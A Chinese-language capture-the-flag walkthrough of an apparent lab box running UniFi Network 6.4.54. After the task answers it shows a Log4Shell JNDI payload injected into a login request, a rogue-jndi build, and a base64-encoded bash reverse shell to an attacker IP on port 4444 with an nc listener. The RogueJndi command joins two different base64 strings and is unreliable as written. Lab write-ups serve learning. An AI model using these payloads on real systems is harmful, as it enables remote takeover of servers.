# Task 1

​
Q：What ports are open?
​

┌──(root💀kali)-[~]

└─# nmap -sV -Pn 10.129.248.11

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST

Nmap scan report for 10.129.248.11

Host is up (0.50s latency).

Not shown: 996 closed tcp ports (reset)

PORT     STATE SERVICE         VERSION

22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

6789/tcp open  ibm-db2-admin?

8080/tcp open  http-proxy

8443/tcp open  ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service :

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 157.90 seconds

nmap 扫一下立刻出结果！
​
A：22,6789,8080,8443
​

# Task 2

Q：Name of the software that is running on the highest port?

namp 通过端口没有识别出来，那么我们访问看看

Bad Request

This combination of host and port requires TLS.

提示我们需要使用 TSL 协议，那么我们用 https
访问
​
这个恐怕只能肉眼识别然后人工搜索是什么软件了 ==、

A：UniFI network
​

# Task 3

Q：What is the version of the software that is running?
​
页面上的 logo 下面写了版本号 ==、
​
A：6.4.54
​

# Task 4

Q：What is the CVE for the identified vulnerability?
​
搜索这个软件 + 版本号，得到一个漏洞是 CVE-2021-44228

​
A：cve-2021-44228
​

# Task 5

Q：What is the version of Maven that we installed?
​
​
​
A： 3.6.3

​

# Task 6

Q：What protocol does JNDI leverage in the injection?
​
A： ldap

​

# Task 7

Q：What tool do we use to intercept the traffic, indicating the attack was successful?
​
A： tcpdump

​

# Task 8

Q：What port do we need to inspect intercepted traffic for?
​
A： 389

​

# Task 9

Q：What port is the MongoDB service running on?
​
A： 27117

​

# Task 10

​
Q：What is the default database name for UniFi applications?
​
A： ace

​

# Task 11

Q：What is the function we use to enumerate users within the database in MongoDB?
​
A： db.admin.find()

​

# Task 12

Q：What is the function to add data to the database in MongoDB?
​
A： db.admin.insert()

​

# Task 13

Q：What is the function we use to update users within the database in MongoDB?
​
A： db.admin.update()

​

# Task 14

Q：What is the password for the root user?
​
A：

# Flag

上来首先 nmap 扫一下端口
发现那个服务，这个在前面的题里面写了
​
得到 CMS 之后就去查对应的漏洞
得到漏洞是 cve-2021-44228

​
我们直接查这个漏洞的文章，对他利用

首先先打开流量监听 sudo tcpdump -i tun0

进去登录的时候直接抓包
在 remember
里面填充 log4j2 的 payload

POST /api/login HTTP/1.1

Host: 10.129.96.149:8443

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage

Content-Type: application/json; charset=utf-8

Origin: https://10.129.96.149:8443

Content-Length: 71

Te: trailers

Connection: close

{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}

payload 里面的 IP 改成自己的网卡 IP
这样如果存在这个漏洞的话就会返回链接
​
我们放掉这个包，就能看到 tcpdump 里面出现了数据
说明进行了回连
那就确定了这个有 log4j 的漏洞
​
那么我们需要构建一个 class 包了
​
我们首先下载 maven

┌──(root💀kali)-[~/桌面/rogue-jndi-master]

└─# apt install maven

安装好了之后下载一个写好的 exp
https://github.com/veracode-research/rogue-jndi
进去文件夹之后直接 ```mvn package

打包这个
​
打包结束后会提示你`BUILD SUCCESS`

​
接着我们获取反弹payload的bash64 加密

```cpp
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# echo 'bash -c bash -i >&/dev/tcp/10.10.16.61/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==

接着我们把服务启动一下

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuOTYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.61"

监听 4444 端口

nc -lnvp 4444